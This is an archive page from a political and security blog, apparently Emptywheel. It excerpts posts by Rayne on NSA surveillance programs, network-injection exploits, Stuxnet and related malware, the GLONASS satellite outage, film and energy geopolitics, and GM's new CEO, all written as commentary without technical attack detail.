Rayne

1 2 3 6

Treasure Map: It’s About Location, Not Gold

Der Spiegel and The Intercept published collaborative reporting this weekend on another Snowden document — this one referring to a National Security Agency program named TREASURE MAP.

The most chilling part of this reporting is a network engineer’s reaction (see here on video) when he realizes he is marked or targeted as a subject of observation. He’s assured it’s not personal, it’s about the work he does – but his reaction still telegraphs stress. An intelligence agency can get to him, has gotten to him; he’s touchable.

The truth is that almost any of us who follow national security, cyber warfare, or information technology are potential subjects depending on our work or play.

The metadata we generate is only part of the observation process; it provides information about our individual patterns of behavior, but may not actually disclose where we are.

TREASURE MAP goes further, by providing the layout of the network on which any of us are generating metadata. But there is some other component either within TREASURE MAP, or within a complementary tool, that provides the physical address of any networked electronic device.

The NSA has the ability to track individuals not only by Internet Protocol addresses (IP addresses), but by media access control addresses (MAC addresses), according a recent interview with Snowden by James Bamford in Wired. This little nugget was a throwaway; perhaps readers already assumed this capability has existed, or didn’t understand the implications:

…But Snowden’s disenchantment would only grow. It was bad enough when spies were getting bankers drunk to recruit them; now he was learning about targeted killings and mass surveillance, all piped into monitors at the NSA facilities around the world. Snowden would watch as military and CIA drones silently turned people into body parts. And he would also begin to appreciate the enormous scope of the NSA’s surveillance capabilities, an ability to map the movement of everyone in a city by monitoring their MAC address, a unique identifier emitted by every cell phone, computer, and other electronic device.

[emphasis added]

In simple terms, IP addresses are like phone numbers — they are assigned. They can be static; a printer on a business network, for example, may be assigned a static address to assure it is always available to accept print orders at a stationary location. IP addresses may also be dynamic; if there’s an ongoing change in users on a network, allowing them to use a temporary address works best. Think of visits to your local coffee shop where customers use WiFi as an example. When they leave the premise, their IP address will soon revert to the pool available on the WiFi router. Continue reading

Internet Cats, Weaponized: US Defense Contractor Consulted on Targeted Network Injection Surveillance for Commercial Sales Abroad

[photo: liebeslakritze via Flickr]

[photo: liebeslakritze via Flickr]

First, a caveat: I would not click on the links embedded in the story I’m recommending (I’m this || close to swearing off embedded links forever). I don’t trust traffic to them not to be monitored or exploited.

But as Jeremy Scahill tweeted last evening, read this piece by WaPo’s Barton Gellman on malicious code insertion. This news explains recent changes by Google to YouTube once it had been disclosed to the company that exploits could be embedded in video content as CitizenLab.org explains:

“… the appliance exploits YouTube users by injecting malicious HTML-FLASH into the video stream. …”
“… the user (watching a cute cat video) is represented by the laptop, and YouTube is represented by the server farm full of digital cats. You can observe our attacker using a network injection appliance and subverting the beloved pastime of watching cute animal videos on YouTube. …”

The questions this piece shake loose are Legion, but as just as numerous are the holes. Why holes? Because the answers are ugly and complex enough that one might struggle with them. Gellman’s done the best he can with nebulous material.

An interesting datapoint in the first graf of the story is timing — fall 2009.

You’ll recall that Google revealed the existence of a cyber attack code named Operation Aurora in January 2010, which Google said began in mid-December 2009.

You may also recall news of a large batch of cyber attacks in July of 2009 on South Korean targets.

The U.S. military had already experienced a massive uptick in cyber attacks in 1H2009, more than double the rate of the entire previous year.

And neatly sandwiched between these waves and events is a visit by a defense contractor CloudShield Technologies engineer from California, to Munich, Germany with British-owned Gamma Group. Continue reading

Snowpiercer: Bong Joon-Ho’s Jab at the God of the Machine


(The cats are away at Netroots Nation, leaving the meese to play. — Rayne)

A number of film critics have written that Snowpiercer — director Bong Joon-Ho’s adaptation of the French dystopic graphic novel, Le Transperceneige — is a cinematic allegory of climate change (the new “cli-fi“). Others will call it an allegory of class warfare. The film released in the U.S. on 27 June, reaching only 374 theaters across the country. Thankfully it went to video-on-demand last Friday as it entered its third week in theaters.

The highly limited and unusual method of release belies the film’s stunning appearance, its stellar cast, its punchy delivery. It’s all of these things and more: gritty, raw, gruesome, action-filled and emotion-tugging. Chris Evans was a surprise, offering restrained yet emotionally exposed work as flawed and resistant Curtis — a far cry from his recent stints as Captain America. Tilda Swinton is her funky finest, and Octavia Spencer is a powerful mother tigress. Korean actors Kang-ho Song and Ah-sung Ko fit perfectly, as do John Hurt and Jamie Bell. Effects are purposeful and not excessive, camera work highly effective, the score clings to the action like a skin.

Snowpiercer is believed to have been dissed on distribution because Bong Joon-Ho insisted on his own cut, resisting Harvey Weinstein’s demands that 20 minutes be excised. Given how closely the story reflects Dante’s Inferno, it’s difficult to see how any cuts affecting up to and through any of its gates would allow the movie to work as it does. (Really, Harvey, which of the circles of hell could we do without? Did you consult with Satan?)

But another reason for the short shrift on distribution may be the film’s unacknowledged allegory: the engine of production continues at all costs.

This is not the message of class warfare which Le Transperceneige’s two books more closely spell out. This is the ugly truth of our current global economy and the descent it makes into a catastrophic climate hell ahead.

The creators of the train ensuring your existence insist you stay where you are, even if you perceive yourself to be at the head of the train. You will be punished if you step out of your assigned place in the works. Resistance is terrorism, and must be eliminated to retain the careful balance necessary to assure production’s continuity. You have no privacy, no rights, no value save for your usefulness to the god of the machine.

This film jabs at the global economy’s bloated belly, wherein gross domestic product is worshipped, and energy’s demands obeyed at the expense of free will and a survivable planet. Bong Joon-Ho’s message is far more subtle and important than that of conflict between labor and capital. It’s certainly more unsettling to the domestic distribution system which desires a sure, non-threatening blockbuster to continue their offering of profit to the god of productivity.

Spoiler (look away now, I’ll put this after the jump): Continue reading

Remotely Yours: Internet of Things Meets Father’s Day

[Graphic: Google Glass by Wilbert Baan via Flickr]

[Graphic: Google Glass by Wilbert Baan via Flickr]

After all you father-types have finished opening your gift-wrapped nifty new cellphones and car stereo systems, wireless remote thermostats, fitness tracking watches, and Google Glasses received from your adoring spawn, you might want set aside a little downtime for reading — perhaps on that tablet or e-reader you received for Father’s Day.

Predicting the future on the Web’s 25th anniversary*, a Pew Internet study published in March this year, reveals the depth of naivete bordering on gross ignorance on the part of so-called experts surveyed for this report.

The subhead alone should concern you:

Experts say the Internet will become ‘like electricity’ over the next decade–less visible, yet more deeply embedded in people’s lives, with many good and potentially bad results

Emphasis mine — because really, how much more deeply embedded does the internet need to become in our lives before we begin to rethink its widening application?

At the risk of sounding Ted Kaczynski-ish, we have allowed the development, implementation and integration of technology to run amok. We’ve only paid attention to the narrowest benefits we might receive from explicit application of any new technology, failing to look at the systemic repercussions of all our technology on all our society and on the planet we share.

It’s not your remote controlled light switch in itself that is a problem. Go ahead, turn on your lights at home while you’re on your summer vacation across country.

It’s the lack of thought about the entirety of the internet itself and its embedment that is a major problem. We’ve already become utterly dependent upon it. The additional little tools and toys we inanely call the “internet of things” will only make the situation more complex.

Ask yourself this: If the internet suddenly crashed this week, completely collapsed for an unspecified length of time, what would happen to the global economy?

What would happen to the health of patients in hospitals and care facilities — are there monitoring and medication-dispensing applications that are both life saving and internet mediated?

How would we conduct and record any kind of transaction, between individuals, between businesses, between governments?

Would our power grid continue to run smoothly without the use of the internet?

At a minimum we should be asking ourselves at what point our government will limit its tracking and compilation of meta data, let alone whether it can use data from one’s wireless slowcooker as a criteria to dispatch a deadly drone. Imagine the mind-boggling size of the data farm required to house all the meta data alone from the internet of things.

We should be asking what happens if foreign governments conduct cyber war through this internet of things what our response should be — conduct cyber-retaliation with equal and measured response, taking out wireless ricecookers and teapots on the other side of the globe?

What happens if our cyberweapons are deployed against us, like a customized Stuxnet invisibly tweaking all the settings on all our internet of things? Would we know we’d been targeted until far too late?

Anyhow, just some food for thought, something to mull over as you flip your remotely monitored ribs on the smoker while sipping on your icy cold brew produced from your wirelessly controlled refrigerator — which may tell you soon you’re low on beer.

Happy Father’s Day!

* h/t @sarahkendzior

[UPDATED] Russian GPS-Alternative Satellites Went ‘Illegal/Failure’: Solar Storm Damage or Cyberwar in Space?

GLONASS_monitoring_02APR2014-1407h_500pxw

[Update at end of article.Rayne 6:45 pm EST]

Between 1030 and 0400 UTC last night or early morning, most of Russia’s GLONASS satellites reported “illegal” or “failure” status. As of this post, they do not appear to be back online.

GLONASS is the equivalent of GPS, an alternative global navigation satellite system (GNSS) launched and operated by Russian Aerospace Defense Forces (RADF). Apart from GPS, it is the only other GNSS with global capability.

It’s possible that the outage is related to either a new M-class solar storm — the start of which was reported about 48 hours ago — or recent X-class solar flare on March 29 at approximately 1700 UTC. The latter event caused a short-term radio blackout about one hour after the flare erupted.

But there is conjecture that GLONASS’ outage is human in origin and possibly deliberate. The absence of any reported outage news regarding GPS and other active satellite systems suggests this is quite possible, given the unlikelihood that technology used in GLONASS differs dramatically from that used in other satellite systems.

At least one observer mentioned that a monitoring system tripped at 21:00 UTC — 00:00 GLONASS system time. The odds of a natural event like a solar storm tripping at exactly top of the hour are ridiculously slim, especially since radiation ejected from the new M-class storm may not reach its peak effect on earth for another 24-48 hours.

GLONASS_monitoring_02APR2014

It’s not clear whether the new GLONASS-M satellite launched March 24th may factor into this situation. There are no English language reports indicating the new satellite was anything but successful upon its release, making it unlikely its integration into the GLONASS network caused today’s outage.

If the outage is based in human activity, the problem may have been caused by:

— an accidental disabling here on earth, though RADF most likely has redundancies to prevent such a large outage;

— deliberate tampering here on earth, though with RADF as operator this seems quite unlikely; or

— deliberate tampering in space, either through scripts sent from earth, or technology installed with inherent flaws.

The last is most likely, and of either scripts sent from earth or the flawed technology scenarios, the former is more likely to cause a widespread outage.

However, if many or all the core operating systems on board the GLONASS satellites had been updated within the last four years – after the discovery of Stuxnet in the wild – it’s not impossible that both hardware and software were compromised with an infection. Nor is it impossible that the same infection was triggered into aggressive action from earth.

Which begs the question: are we in the middle of a cyberwar in space?

UPDATE — 6:45 PM EST—

Sources report the GLONASS satellite network was back online noon-ish Russian time (UTC+4); the outage lasted approximately 11 hours. Unnamed source(s) said the outage was due to the upload of bad ephemeris data, the information used by the satellites to locate other satellites in space. An alleged system-wide update with bad data suggests RADF has serious problems with change management, though.

There is speculation the M-class solar storm, summarized at 1452 UTC as an “X-ray Event exceeded M5,” may have impacted GLONASS. However early feedback about radiation ejected by an M-class storm indicated the effects would not reach earth for 24-48 hours after the storm’s eruption.

Minority Report on Ukraine, or What’s Venezuela Got to Do with It?

I freely admit to being the oddest of the quadruplets in the Emptywheel sensory deprivation pool, producing the quirky minority report from time to time.

Which may explain the following graphic with regard to current geopolitical tensions.

[Source: Google Trends and Google Finance]

[Source: Google Trends and Google Finance]

 As you can see, not every trending burp in the news about either Venezuela or Ukraine produced a corresponding bump in the fossil fuel market. Some trend-inducing news may have nothing at all to do with energy. It’s quite possible I may not have captured other key businesses as some of them don’t trade publicly, or are don’t trade in a manner readily captured by Google Finance.

But there are a few interesting relationships between news and price spikes, enough to make one wonder what other values may spike with increased volatility in places like Venezuela (which has the largest oil and natural gas reserves in the western hemisphere), and Ukraine (which lies between the EU and the largest natural gas deposits in the world, and the world’s eighth largest oil reserves).

Of course there’s an additional link between these two disparate countries. Both of them have already seen similar upheavals in which the U.S. played a role — Ukraine’s 2004 Orange Revolution, and the 2002 attempted coup in Venezuela.

When someone made noise about an Afghan Muslim being a key locus of the latest unrest in Ukraine, I couldn’t help but think of the Trans-Afghanistan Pipeline for natural gas which has yet to be realized, primarily for a lack of adequate political will among nation-states with a vested interest in its success.

It also made me think of news reports from this past summer when Turkmenistan, sitting on the fourth largest natural gas reserves in the world, expressed a readiness to export gas to Europe. This would cut into Russia’s sales, but not for a few years, requiring continuation of existing relationships for the next three to five years. Note the pipelines, existing and planned on the following U.S. State Department map (date unclear, believed to be post-2006).*

Continue reading

GM’s New CEO: This Model Has Titanium Features

Mary Barra, CEO-General MotorsThe woman in the photo at the right has big titanium ovaries — not malleable brass or rusting iron. Do I know Mary Barra personally to attest to this fact? No. But I have a pretty damned good idea where GM’s new CEO has been, and it takes a pretty tough set of specifications to survive the road she’s traveled.

Like her I grew up in the I-75 corridor in Michigan, where much of the automotive industry’s OEM facilities and Tiers 1 through 3 suppliers could be found. Like her father, my father worked in the automotive business; if her household was like mine, there were copies of Car and Driver, Road & Track, machinist, tool-and-die, and metalforming magazines cluttering coffee tables or in dad’s man-cave. The smell of machine oil and the grit of metal chips are familiar, as are an ever-present collection of safety glasses, hearing protection, and greasy jumpsuits. Picture a garage like that in Clint Eastwood’s movie Gran Torino; I’ll lay good money her dad probably spent a lot of his free time between shifts in a home shop like that, and where she might have been found as well if he needed a hand or she needed a tool to fix something.

It was in her blood, I’m sure; I’ll bet she could taste it. I’m pretty certain this is why she went into engineering, and likely why she went to that particular private engineering school.

After working for a couple years as a high school engineering co-op student I had been accepted at the same school, but I went a different road, preferring business and then-nascent computing technology over engineering. My daughter, though, is at that school now. She could taste it, too; we have pictures of her at age nine, wearing safety glasses, proudly holding her first aluminum machined part. She’s the first person her dad asks for help when working on the cars at home.

I wish now I’d taken pictures of her the time she was so damned mad at her brother and his friend for accidentally breaking the sibling-shared PlayStation 2 console. She ripped it down, diagnosed it using internet research, fixed and reassembled it on her own in an afternoon.

Driven to identify and solve the problem — that’s what it takes to choose engineering as a career, particularly if you are a woman.

Sure, men too must be driven to pursue the same field, but they don’t face the hurdles that women faced then or even now, 30 years after General Motors’ new CEO first started college at the former General Motors Institute. Nobody ever questions a boy’s right to pursue engineering, or a man’s right to practice that discipline. Nobody ever questions the gender of a man with an engineering degree when he makes it to the pinnacle of the corporate ladder. Continue reading

BBC’s Adam Curtis’ Fluck Up

Every once in a while there’s an opinion piece so grossly naive, horribly uninformed, or passively apologetic that it deserves pushback.

BBC’s Adam Curtis’ blog post, WHAT THE FLUCK [sic], is such a piece. Read it for yourself. I’m still scratching my head about this overlong, winding post that ultimately says,

“…Maybe today we are being farmed by the new system of power. But we can’t see quite how it is happening – and we need a new journalism to explain what is really going on. …”

No. We have the right journalism, even if it is not perfect or dispersed evenly, even if we could use more of it. The Guardian’s work on the Snowden story is just one example; if I may say so, Emptywheel sets another fine example as citizen journalism.

What we need is a public willing to invest time and energy in reading the material reported, discuss it openly after careful analysis, willing to demand and support more good journalism by way of subscription, donation, or advertising revenues as a last resort.

What we don’t need are naive or uninformed opinion leaders who tell us we don’t have journalism reporting about the size, scale, and nature of the corruption we face.

What we don’t need are apologias masquerading as demands for more and better journalism.

Curtis’ piece in particular does several things to muddy the public’s perception about journalism today:

• He throws us a narrative about poor little rich girl Tamara Yeardye Mellon and her father that is not unlike reading about poor little Paris Hilton, or poor little Kardashian Annoying-Sister-Of-The-Day. The narrative utterly misses a critical point, derailing its own effort, yet he feels the public need more backstory narrative in order to really understand today’s challenges..

• Rupert Murdoch is treated as if he was handed a bag of flaming dog poo by his editorial predecessor, dealing with the mess in the best manner he could — as if cellphone hacking by Murdoch’s employees was mere fallout inherited immaculately by Murdoch.

• Curtis ignores his own role, using his bully pulpit to complain about an absence of reporting he is capable of providing instead of this meandering whinge.

With regard to Tamara Mellon’s allegedly lost control over of her luxe shoe business Jimmy Choo Limited to Phoenix Private Equity, Curtis failed to note that not even a Mellon family member is safe from predation. Even a Mellon can be made into a corporate vulture’s bitch.

What does this tell us about the nature of the beast? Continue reading

Information Monopoly Defines the Deep State

Monopoly_rutty-FlickrThe last decade witnessed the rise of deep state — an entity not clearly delineated that ultimately controls the military-industrial complex, establishing its own operational policy and practice outside the view of the public in order to maintain its control.

Citizens believe that the state is what they see, the evidence of their government at work. It’s the physical presence of their elected representatives, the functions of the executive office, the infrastructure that supports both the electoral process and the resulting machinery serving the public at the other end of the sausage factory of democracy. We the people put fodder in, we get altered fodder out — it looks like a democracy.

But deep state is not readily visible; it’s not elected, it persists beyond any elected official’s term of office. While a case could be made for other origins, it appears to be born of intelligence and security efforts organized under the Eisenhower administration in response to new global conditions after World War II. Its function may originally have been to sustain the United States of America through any threat or catastrophe, to insure the country’s continued existence.

Yet the deep state and its aims may no longer be in sync with the United States as the people believe their country to be — a democratic society. The democratically elected government does not appear to have control over its security apparatus. This machinery answers instead to the unseen deep state and serves its goals.

As citizens we believe the Department of State and the Department of Defense along with all their subset functions exist to conduct peaceful relations with other nation-states while protecting our own nation-state in the process. Activities like espionage for discrete intelligence gathering are as important as diplomatic negotiations to these ends. The legitimate use of military force is in the monopolistic control of both Departments of State and Defense, defining the existence of a state according to philosopher Max Weber.

The existing security apparatus, though, does not appear to function in this fashion. It refuses to answer questions put to it by our elected representatives when it doesn’t lie to them outright. It manages and manipulates the conditions under which it operates through implicit threats. The legitimacy of the military force it yields is questionable because it cannot be restrained by the country’s democratic processes and may subvert control over military functions.

Further, it appears to answer to some other entity altogether. Why does the security apparatus pursue the collection of all information, in spite of such activities disrupting the ability of both State and Defense Departments to operate effectively? Why does it take both individuals’ and businesses’ communications while breaching their systems, in direct contravention to the Constitution’s Fourth Amendment prohibition against illegal search and seizure? Continue reading

Stuxnet and the Poisons that Open Your Eyes

Poison_EUstdimage-Wikipedia_200px_mod2Playwright August Strindberg wrote, “…There are poisons that blind you, and poisons that open your eyes.

We’ve been blinded for decades by complacency and stupidity, as well as our trust. Most Americans still naively believe that our government acts responsibly and effectively as a whole (though not necessarily its individual parts).

By effectively, I mean Americans believed their government would not deliberately launch a military attack that could affect civilians — including Americans — as collateral damage. Such a toll would be minimized substantively. Yesterday’s celebration related to the P5+1 interim agreement regarding Iran’s nuclear development program will lull most Americans into deeper complacency. The existing system worked, right?

But U.S. cyber warfare to date proves otherwise. The government has chosen to deliberately poison the digital waters so that all are contaminated, far beyond the intended initial target.

There’s very little chance of escaping the poison, either. The ubiquity of U.S. standards in hardware and software technology has ensured this. The entire framework — the stack of computing and communications from network to user applications — has been affected.

• Network: Communications pathways have been tapped, either to obtain specific content, or obtain a mirror copy of all content traveling through it. It matters not whether telecom network, or internal enterprise networks.

• Security Layer: Gatekeeping encryption has been undermined by backdoors and weakened standards, as well as security certificates offering handshake validation
between systems.

• Operating Systems: Backdoors have been obtained, knowingly or unknowingly on the part of OS developers, using vulnerabilities and design flaws. Not even Linux can be trusted at this point (Linux progenitor Linus Torvalds has not been smart enough to offer a dead man’s switch notification.)

• User Applications: Malware has embedded itself in applications, knowingly or unknowingly on the part of app developers.

End-to-end, top-to-bottom and back again, everything digital has been touched in one layer of the framework or another, under the guise of defending us against terrorism and cyber warfare.

Further, the government watchdogs entrusted to prevent or repair damage have become part and parcel of the problem, in such a way that they cannot effectively be seen to defend the public’s interests, whether those of individual citizens or corporations. The National Institute of Standards and Technology has overseen the establishment and implementation of weak encryption standards for example; it has also taken testimony [PDF] from computing and communications framework hardware and software providers, in essence hearing where the continued weak spots will be for future compromise.

The fox is watching the hen house, in other words, asking for testimony pointing out the weakest patches installed on the hen house door.

The dispersion of cyber poison was restricted only in the most cursory fashion.

Stuxnet’s key target appears to have been Iran’s Natanz nuclear facility, aiming at its SCADA equipment, but it spread far beyond and into the private sector as disclosed by Chevron. The only protection against it is the specificity of its end target, rendering the rest of the malware injected but inert. It’s still out there.

Duqu, a “sibling” cyber weapon, was intended for widespread distribution, its aims two-fold. It delivered attack payload capability, but it also delivered espionage capability.

• Ditto for Flame, yet another “sibling” cyber weapon, likewise intended for widespread distribution, with attack payload and espionage capability.

There could be more than these, waiting yet to be discovered.

In the case of both Duqu and Flame, there is a command-and-control network of servers still in operation, still communicating with instances of these two malware cyber weapons. The servers’ locations are global — yet another indicator of the planners’/developers’ intention that these weapons be dispersed widely.

Poison everything, everywhere.

But our eyes are open now. We can see the poisoners fingerprints on the work they’ve done, and the work they intend to do. Continue reading

1 2 3 6

Emptywheel Twitterverse
bmaz @seattletimes @nigelduara 30 hours overtime in a day?? "Lax" seems a wee bit 'o and understatement.
21mreplyretweetfavorite
bmaz @ArizonaLuke @brahmresnik @noprezzie2012 @cocoasaurus That's pathetic. Grow up little punk.
34mreplyretweetfavorite
bmaz @ArizonaLuke @brahmresnik @noprezzie2012 @cocoasaurus Right back at ya, Mr. Mindless "Producer of Events"
37mreplyretweetfavorite
bmaz @JulieATate @attackerman Isn't it like 4 am or something there on the other side of the country? What you doing up girl?
40mreplyretweetfavorite
bmaz @ArizonaLuke @brahmresnik @noprezzie2012 @cocoasaurus Do you get paid to troll people with that bogus Alinsky shit, or just have no life?
42mreplyretweetfavorite
bmaz @fordm Lorde knows
48mreplyretweetfavorite
bmaz @fordm Matt.....
50mreplyretweetfavorite
JimWhiteGNV @biasedreporter Somehow they wound up in spam. Don't know why. I freed one copy.
2hreplyretweetfavorite
JimWhiteGNV @biasedreporter Hmm. Not sure what went wrong. I don't see it in moderation, either.
3hreplyretweetfavorite
October 2014
S M T W T F S
« Sep    
 1234
567891011
12131415161718
19202122232425
262728293031